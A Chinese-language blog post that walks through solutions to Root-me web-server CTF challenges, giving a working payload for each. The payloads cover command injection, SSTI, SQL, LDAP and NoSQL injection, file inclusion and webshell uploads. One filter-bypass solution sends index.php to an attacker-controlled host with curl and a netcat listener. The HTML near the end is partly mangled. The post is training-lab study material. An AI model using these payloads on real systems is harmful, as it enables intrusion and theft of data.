<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="root-me是一个在线的ctf题库(需翻墙)，包含了各个维度的题型，题不算难，但是比较全面。做了一下web-server的题，并做了记录。 1.HTML[+]URL: http://challenge01.root-me.org/web-serveur/ch1/[+]Statement:找到flag[+]Solution:flag在源码里,F12即可 2.HTTP - Open redirect">
<meta property="og:type" content="article">
<meta property="og:title" content="Root-me Web-server">
<meta property="og:url" content="https://yyhylh.github.io/2018/11/22/Root-me-Web-server/index.html">
<meta property="og:site_name" content="LLLH&#39;s Blog">
<meta property="og:description" content="root-me是一个在线的ctf题库(需翻墙)，包含了各个维度的题型，题不算难，但是比较全面。做了一下web-server的题，并做了记录。 1.HTML[+]URL: http://challenge01.root-me.org/web-serveur/ch1/[+]Statement:找到flag[+]Solution:flag在源码里,F12即可 2.HTTP - Open redirect">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2018-11-22T08:33:39.605Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Root-me Web-server">
<meta name="twitter:description" content="root-me是一个在线的ctf题库(需翻墙)，包含了各个维度的题型，题不算难，但是比较全面。做了一下web-server的题，并做了记录。 1.HTML[+]URL: http://challenge01.root-me.org/web-serveur/ch1/[+]Statement:找到flag[+]Solution:flag在源码里,F12即可 2.HTTP - Open redirect">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://yyhylh.github.io/2018/11/22/Root-me-Web-server/"/>





  <title>Root-me Web-server | LLLH's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  
  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">LLLH's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://yyhylh.github.io/2018/11/22/Root-me-Web-server/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="LH">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LLLH's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Root-me Web-server</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-11-22T16:31:00+08:00">
                2018-11-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>root-me是一个在线的ctf题库(需翻墙)，包含了各个维度的题型，题不算难，但是比较全面。做了一下web-server的题，并做了记录。</p>
<h1 id="1-HTML"><a href="#1-HTML" class="headerlink" title="1.HTML"></a>1.HTML</h1><p>[+]URL: <a href="http://challenge01.root-me.org/web-serveur/ch1/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch1/</a><br>[+]Statement:找到flag<br>[+]Solution:flag在源码里,F12即可</p>
<h1 id="2-HTTP-Open-redirect"><a href="#2-HTTP-Open-redirect" class="headerlink" title="2.HTTP - Open redirect"></a>2.HTTP - Open redirect</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch52/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch52/</a><br>[+]Statement:找到一种方法把网页定向到其他网站<br>[+]Solution:修改url里get的网站名，并计算其md5值<br>[+]Payload:/web-serveur/ch52/?url=<a href="https://www.baidu.com&amp;h=f9751de431104b125f48dd79cc55822a" target="_blank" rel="external">https://www.baidu.com&amp;h=f9751de431104b125f48dd79cc55822a</a></p>
<h1 id="3-Command-injection"><a href="#3-Command-injection" class="headerlink" title="3.Command injection"></a>3.Command injection</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch54/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch54/</a><br>[+]Statement:找到漏洞并利用，flag在index.php里<br>[+]Solution:典型的命令注入漏洞，利用;分割命令，使用cat打印源码，再用F12查看<br>[+]Payload:127.0.0.1;cat index.php</p>
<h1 id="4-Weak-password"><a href="#4-Weak-password" class="headerlink" title="4.Weak password"></a>4.Weak password</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch3/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch3/</a><br>[+]Solution:标题提示弱密码，账户admin，密码admin，登录成功</p>
<h1 id="5-User-agent"><a href="#5-User-agent" class="headerlink" title="5.User-agent"></a>5.User-agent</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch2/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch2/</a><br>[+]Solution:修改User-agent为admin</p>
<h1 id="6-Backup-file"><a href="#6-Backup-file" class="headerlink" title="6.Backup file"></a>6.Backup file</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch11/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch11/</a><br>[+]Solution:输入index.php~即可下载源码</p>
<h1 id="7-HTTP-POST"><a href="#7-HTTP-POST" class="headerlink" title="7.HTTP - POST"></a>7.HTTP - POST</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch56/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch56/</a><br>[+]Statement:想办法打败最高分<br>[+]Solution:用bp修改数据包，把score参数的值修改到大于999999即可</p>
<h1 id="8-HTTP-directory-indexing"><a href="#8-HTTP-directory-indexing" class="headerlink" title="8.HTTP directory indexing"></a>8.HTTP directory indexing</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch4/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch4/</a><br>[+]Solution:在源码里发现存在文件admin/pass.html,输入payload：admin可以列出目录，在backup的admin.txt到到flag</p>
<h1 id="9-HTTP-Headers"><a href="#9-HTTP-Headers" class="headerlink" title="9.HTTP Headers"></a>9.HTTP Headers</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch5/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch5/</a><br>[+]Statement:获得 administrator用户权限<br>[+]Solution:在服务器的返回头里发现Header-RootMe-Admin: none，于是在请求里加上Header-RootMe-Admin:administrator,得到flag</p>
<h1 id="10-HTTP-verb-tampering"><a href="#10-HTTP-verb-tampering" class="headerlink" title="10.HTTP verb tampering"></a>10.HTTP verb tampering</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch8/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch8/</a><br>[+]Solution:篡改HTTP请求，换成OPTIONS即可绕过</p>
<h1 id="11-Install-files"><a href="#11-Install-files" class="headerlink" title="11.Install files"></a>11.Install files</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch6/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch6/</a><br>[+]Solution:题目提示PHPBB和installfiles，查看PHPBB源码得知PHPBB的安装路径为/install/install.php。输入此路径得到flag。此漏洞提示我们安装完CMS后记得删除安装文件</p>
<h1 id="12-Improper-redirect"><a href="#12-Improper-redirect" class="headerlink" title="12.Improper redirect"></a>12.Improper redirect</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch32/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch32/</a><br>[+]Solution:使用BP抓包可以看到get上面的URL时返回的数据包里有flag。此漏洞提醒在使用PHP里的header(‘Location:…’)函数后需要使用exit()，不然php会继续执行后面的代码，可能会造成信息泄漏</p>
<h1 id="13-CRLF"><a href="#13-CRLF" class="headerlink" title="13.CRLF"></a>13.CRLF</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch14/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch14/</a><br>[+]Statement:注入错误的数据到日志中<br>[+]Solution:页面显示的日志中存在认证失败和认证成功两种信息。通过使用CRLF注入，在username参数的位置注入一个%0d%0a，伪造出一个认证成功的信息<br>[+]Payload:username=admin authenticated.%0D%0Aadmin&amp;password=123</p>
<h1 id="14-File-upload-double-extensions"><a href="#14-File-upload-double-extensions" class="headerlink" title="14.File upload - double extensions"></a>14.File upload - double extensions</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch20/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch20/</a><br>[+]Statement:目标是上传php代码，查看应用根目录的.passwd文件<br>[+]Solution:在 /?galerie=upload处可以上传文件，直接上传php文件会被拦截。使用bp上传一句话木马，并把文件名改为1.php.jpg,测试发现web服务器可以解析该文件，通过执行系统命令可以看到.passwd的内容</p>
<h1 id="15-File-upload-MIME-type"><a href="#15-File-upload-MIME-type" class="headerlink" title="15.File upload - MIME type"></a>15.File upload - MIME type</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch21/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch21/</a><br>[+]Statement:同上<br>[+]Solution:同上面一样上传文件，并在BP中把数据包的MIME类型修改为image/png,上传成功。</p>
<h1 id="16-HTTP-cookies"><a href="#16-HTTP-cookies" class="headerlink" title="16.HTTP cookies"></a>16.HTTP cookies</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch7/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch7/</a><br>[+]Solution:在网页的源码中看见了提示SetCookie(‘ch7,’visiteur’’),结合页面的提示，在请求头中加上Cookie:ch7=admin，获得flag</p>
<h1 id="17-Directory-traversal"><a href="#17-Directory-traversal" class="headerlink" title="17.Directory traversal"></a>17.Directory traversal</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch15/ch15.php" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch15/ch15.php</a><br>[+]Solution:目录穿越漏洞，输入payload：?galerie=/，可列出galerie目录下的文件列表，接着输入payload：?galerie=/86hwnX2r/，可以看到password.txt。访问这个文件，得到flag</p>
<h1 id="18-File-upload-null-byte"><a href="#18-File-upload-null-byte" class="headerlink" title="18.File upload - null byte"></a>18.File upload - null byte</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch22/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch22/</a><br>[+]Solution:同样是文件上传漏洞，这里是00截断,需要把filename改成1.php%00.jpg，同时需要修改MIMIE类型。</p>
<h1 id="19-PHP-assert"><a href="#19-PHP-assert" class="headerlink" title="19.PHP assert()"></a>19.PHP assert()</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch47/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch47/</a><br>[+]Statement:Find and exploit the vulnerability to read the file .passwd.<br>[+]Solution:提供错误的page参数，根据回显的assert函数的结果，可以进行拼接执行命令。<br>[+]payload:?page=%27,%27..%27)%20===%20false%20and%20system(%27cat%20.passwd%27)%20and%20strpos(%27</p>
<h1 id="20-PHP-filters"><a href="#20-PHP-filters" class="headerlink" title="20.PHP filters"></a>20.PHP filters</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch12/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch12/</a><br>[+]Statement:找到administrator用户的密码<br>[+]Solution：通过报错发现使用了include函数，此处有文件包含漏洞，使用file://etc/passwd,发现不能包含远程文件。使用php协议进行本地文件包含<br>[+]Payload:</p>
<ul>
<li><a href="http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php</a></li>
<li><a href="http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php</a><h1 id="21-PHP-register-globals"><a href="#21-PHP-register-globals" class="headerlink" title="21.PHP register globals"></a>21.PHP register globals</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch17/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch17/</a><br>[+]Statement:似乎开发者经常把备份文件留下…<br>[+]Solution:根据提示，下载到文件index.php.bak,分析源码。根据测试判断该服务器开启了register_globals，因此存在变量覆盖漏洞。根据源码的逻辑，有两种解题思路，一种是直接覆盖session[logged],另一种方法，覆盖password和hidden_password，接着使用这个Cookie，就可以获得flag<br>[+]Payload:</li>
<li>_SESSION[logged]=1</li>
<li>password=1&amp;hidden_password=1<h1 id="22-File-upload-ZIP"><a href="#22-File-upload-ZIP" class="headerlink" title="22.File upload - ZIP"></a>22.File upload - ZIP</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch51/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch51/</a><br>[+]Statement:读index.php文件1qqq<br>[+]Solution:目标是要读到index.php的内容。网站的文件上传功能只能上传.zip文件，上传完成后，服务器会解压缩，解压缩后的文件可以访问。但问题是上传的文件只有txt/jpg可以访问。因此构造命令如下，创建一个符号链接。<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ln -s ../../../index.php index.txt</div></pre></td></tr></table></figure>
</li>
</ul>
<p>接着使用如下命令压缩这个符号链接。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">zip --symlinks index.zip index.txt</div></pre></td></tr></table></figure></p>
<p>上传这个zip文件，再访问index.txt,即可读到服务器上的index.php</p>
<h1 id="23-Command-injection-Filter-bypass"><a href="#23-Command-injection-Filter-bypass" class="headerlink" title="23.Command injection - Filter bypass"></a>23.Command injection - Filter bypass</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch53/index.php" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch53/</a><br>[+]Statement:找到漏洞并利用，她有一些保护。flag在index.php里<br>[+]Solution:同样的命令注入，发现过滤掉了一些符号，同时命令的运行结果不会返回，经过测试发现 - 没有被过滤，但 |  &lt; &gt; ; \ ` &amp; 等符号被过滤掉了，但是仍然可以用%0a注入新的命令，另外反弹shell不太能实现，选择使用curl上传文件的方法读文件。<br>先在vps上监听<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nc -lvv 9999</div></pre></td></tr></table></figure></p>
<p>接着执行payload如下，可以读到index.php<br>[+]Payload:127.0.0.1%0acurl -F ‘filename=@index.php’ HOST_ADDRESS:9999</p>
<h1 id="24-Local-File-Inclusion"><a href="#24-Local-File-Inclusion" class="headerlink" title="24.Local File Inclusion"></a>24.Local File Inclusion</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch16/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch16/</a><br>[+]Statement:获得Admin的部分<br>[+]Solution:该服务器是一个明显的本地文件包含，结合提示构造url读取admin下的index.php<br>[+]Payload:<a href="http://challenge01.root-me.org/web-serveur/ch16/?files=crypto&amp;f=../../admin/index.php" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch16/?files=crypto&amp;f=../../admin/index.php</a></p>
<h1 id="25-Local-File-Inclusion-Double-encoding"><a href="#25-Local-File-Inclusion-Double-encoding" class="headerlink" title="25.Local File Inclusion - Double encoding"></a>25.Local File Inclusion - Double encoding</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch45/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch45/</a><br>[+]Statement:在网站的源码里找到认证密码<br>[+]Solution:在URL里发现是一个文件包含。直接使用php://filter/…会发现被拦截了。根据提示，进行url编码，编码一次还是会被拦截，当编码两次时成功绕过。此处需要注意的是，使用在线的或者是python等urlencode的api时，它不会编码 . ,需要手动把.编码成%2e,才能绕过。通过查看源码，可以找到存在密码的config.inc.php<br>[+]Payload:</p>
<ul>
<li>php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dcv</li>
<li>php%253A%252F%252Ffilter%252Fconvert%252Ebase64%252Dencode%252Fresource%253Dconf<h1 id="26-PHP-Loose-Comparison"><a href="#26-PHP-Loose-Comparison" class="headerlink" title="26.PHP - Loose Comparison"></a>26.PHP - Loose Comparison</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch55/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch55/</a><br>[+]Solution:页面可以查看源码。代码的逻辑是传入两个字母和数字组成的字符串，第一个字符串和一个随机数拼接，要求和第二个参数的md5值相等。题目使用==来判断。==在两者的类型不同时先转换类型为相同再比较，如果有数字类型的就会按数字类型转换。根据题目构造payload，即可获得flag<br>[+]Payload:s=0e242&amp;h=240610708&amp;submit=Check<h1 id="27-PHP-preg-replace"><a href="#27-PHP-preg-replace" class="headerlink" title="27.PHP preg_replace()"></a>27.PHP preg_replace()</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch37/index.php" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch37/index.php</a><br>[+]Statement:读flag.php<br>[+]Solution:经过测试发现页面的三个输入点分别对应preg_replace的三个参数，利用preg_replace在第一个参数有/e的标示下，当满足匹配时会把第二个参数当作代码执行，因此构造payload可以读文件<br>[+]Payload:search=/a/e&amp;replace=file_get_contents(‘flag.php’)&amp;content=a<h1 id="28-PHP-type-juggling"><a href="#28-PHP-type-juggling" class="headerlink" title="28.PHP type juggling"></a>28.PHP type juggling</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch44/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch44/</a><br>[+]Solution:可以看到源码，页面的逻辑是需要满足$auth[‘data’][‘login’] == $USER &amp;&amp; !strcmp($auth[‘data’][‘password’]。同样是两个弱类型比较，第一个只需要满足值为0或者为true，即可绕过，strcmp需要使传入的参数为不含有字母的数组，即可绕过。<br>[+]Payload:auth=%7B%22data%22%3A%7B%22login%22%3A0%2C%22password%22%3A[122]%7D%7D<h1 id="29-Remote-File-Inclusion"><a href="#29-Remote-File-Inclusion" class="headerlink" title="29.Remote File Inclusion"></a>29.Remote File Inclusion</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch13/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch13/</a><br>[+]Statement:获取PHP源代码<br>[+]Solution:测试发现有文件包含，且开启了allow_url_fopen和allow_url_include，即可以实现远程文件包含。由于在代码执行时，用户的参数被加上了后缀，使用php://input或者是file://….不太好用，因此选择使用data:text/plain,&lt;?php … ?&gt;进行文件包含，可以读到源码<br>[+]Payload:?lang=data:text/plain,&lt;?php echo file_get_contents(‘index.php’); ?&gt;<h1 id="30-Server-side-Template-Injection"><a href="#30-Server-side-Template-Injection" class="headerlink" title="30.Server-side Template Injection"></a>30.Server-side Template Injection</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch41/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch41/</a><br>[+]Statement:JAVA EE。利用漏洞获得SECRET_FLAG.txt中的密码。<br>[+]Solution:根据提示，得知服务器使用的中间件为JAVAEE，查询资料得知FreeMarker为java下最受欢迎的模版引擎，利用其格式在输入点输入${3*3}，发现被渲染成了9。利用FreeMarker的一个可以用来执行命令的类构造出如下payload，即可查看flag内容。<br>[+]Payload:nickname=&lt;#assign ex=”freemarker.template.utility.Execute”?new()&gt; ${ ex(“cat SECRET_FLAG.txt”) }<h1 id="31-SQL-injection-authentication"><a href="#31-SQL-injection-authentication" class="headerlink" title="31.SQL injection - authentication"></a>31.SQL injection - authentication</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch9/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch9/</a><br>[+]Statement:获取管理员的密码<br>[+]Solution:无任何过滤的注入，通过order by参数可以控制登录的用户，审查元素获得密码<br>[+]Payload:login=123#&amp;password=1’ or ‘1’=’1’ order by 1 –+<h1 id="32-SQL-injection-authentication-GBK"><a href="#32-SQL-injection-authentication-GBK" class="headerlink" title="32.SQL injection - authentication - GBK"></a>32.SQL injection - authentication - GBK</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch42/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch42/</a><br>[+]Statement:获取管理员的密码<br>[+]Solution:根据题目判断是宽字节注入，所以利用%df逃逸PHP函数的转译。<br>[+]Payload:login=%bf’ or 1=1 – -&amp;password=abc<h1 id="33-SQL-injection-string"><a href="#33-SQL-injection-string" class="headerlink" title="33.SQL injection - string"></a>33.SQL injection - string</h1>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch19/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch19/</a><br>[+]Statment:获取管理员密码<br>[+]Solution:测试网页，发现在action=recherche页面可以使用union函数注入，并且有回显。一步步构造Payload获取管理员密码<br>[+]Payload:<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">recherche=1&apos; union select 1,name FROM sqlite_master where tpye=&apos;table&apos;--+</div><div class="line">recherche=1&apos; union select 1,sql FROM sqlite_master where type=&apos;table&apos; --+</div><div class="line">recherche=1&apos; union select username,password FROM users  --+</div></pre></td></tr></table></figure>
</li>
</ul>
<h1 id="34-LDAP-injection-authentication"><a href="#34-LDAP-injection-authentication" class="headerlink" title="34.LDAP injection - authentication"></a>34.LDAP injection - authentication</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch25/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch25/</a><br>[+]Statement:绕过验证<br>[+]Solution:根据题目提示为LDAP注入，LDAP是一种轻量级目录协议，主要用于资源查询。输入 username=<em>)(%26&amp;password=111发现页面报错，并给出了查询的结构，根据给出查询结构，构造Payload，即可绕过<br>[+]Payload:username=</em>)(|(userPassword=*&amp;password=1)</p>
<h1 id="35-NoSQL-injection-authentication"><a href="#35-NoSQL-injection-authentication" class="headerlink" title="35.NoSQL injection - authentication"></a>35.NoSQL injection - authentication</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch38/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch38/</a><br>[+]Statement:找到隐藏用户的用户名<br>[+]Solution:题目提示NoSQL注入，查询资料了解mongodb的基本命令和注入方法。了解到$ne为!=符号，构造payload可以形成重言式注入。构造Payload如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">login[$ne]=123&amp;pass[$ne]=123</div></pre></td></tr></table></figure></p>
<p>它在服务器端会被解释为{‘login’=&gt;{‘$ne’=&gt;’123’},’pass’=&gt;{‘$ne’=&gt;’123’}}，从单一目标查询变成了条件查询，形成永真式。此时页面返回You are connected as:admin。并没有给出flag。于是更改Payload如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">login[$ne]=admin&amp;pass[$ne]=123</div></pre></td></tr></table></figure></p>
<p>页面此时返回You are connected as:test。这个用户也不是隐藏用户。于是使用mongodb的正则表达式筛选非admin或者test用户。Payload如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">login[$regex]=^[^(a|t)]&amp;pass[$ne]=1</div></pre></td></tr></table></figure></p>
<p>即可得到flag。</p>
<h1 id="36-Path-Truncation"><a href="#36-Path-Truncation" class="headerlink" title="36.Path Truncation"></a>36.Path Truncation</h1><p>[+]URL:<a href="http://challenge01.root-me.org/web-serveur/ch35/" target="_blank" rel="external">http://challenge01.root-me.org/web-serveur/ch35/</a><br>[+]Statement:获取进入管理员空间的方法<br>[+]Solution:根据提示得知是路径截断，结合PHP limit提示，查询资料得知在<php5.3版本的情况下，有一个本地文件包含的路径截断漏洞， 即当输入的字符大于4096字节后，php会截断后面的字符。也就完成了路径截断，利用条件是magic_quotes_gpc是关闭的。构造payload即可获取flag="" [+]payload:="" <figure="" class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">page=a/../admin.html/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././